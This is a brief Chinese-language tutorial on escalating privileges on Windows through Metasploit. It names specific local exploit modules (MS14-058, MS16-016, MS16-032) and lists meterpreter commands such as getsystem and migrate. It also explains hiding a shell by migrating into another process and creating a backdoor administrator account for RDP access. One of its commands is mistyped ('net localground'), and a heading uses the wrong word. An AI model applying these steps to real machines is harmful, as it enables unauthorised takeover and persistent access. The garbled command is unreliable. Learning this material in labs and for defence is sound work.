1. 常见的提取板块
metasploit提权EXP存储文件夹路径: usr/share/metasploit-framework/modules/exploits/windows/local#windows:windows/local
Windows常见的提权模块:
ms14_058 内核模式驱动程序中的漏洞可能允许远程执行代码
ms16_016 WebDAV本地提权漏洞(CVE-2016-0051)
ms16_032 MS16-032 Secondary Logon Handle 本地提权漏漏洞
2. 提权流程
首先依旧是写反弹shell监听获得低权限。
随后可以试一试常用的命令:
sysinfo 查看系统信息
migrate 注入流程
getuid 当前用户
getprivs 尽可能提升权限
getsystem 通过各种攻击向量来提升系统用户权限
基础命令:
ps 列出进程
background 把session放在后台
sessions 查看会话
back 返回主界面
shell 得到终端
search 搜索模块
show 列模块
info 查看模块信息
通过在shell中输入systeminfo,可以查看当前电脑的补丁情况来选择可以使用的攻击模块。
3. 保持权限
拿到权限后,为了保证shell不被发现,需要进行转移。
首先ps来查看当前的进程,找到要转移的进程的id
然后migrate id注入进程,注入成功后,在ip没有变化的情况下,一旦靶机启动被注入的进程,它就会和meterpreter保持连接。
4. 远程连接
创建管理员账户:
net user username password /add //替换username和password
net localground administrators username /add
kali远程连接靶机:
rdesktop ip (如果3389端口打开不了就上传打开端口的工具)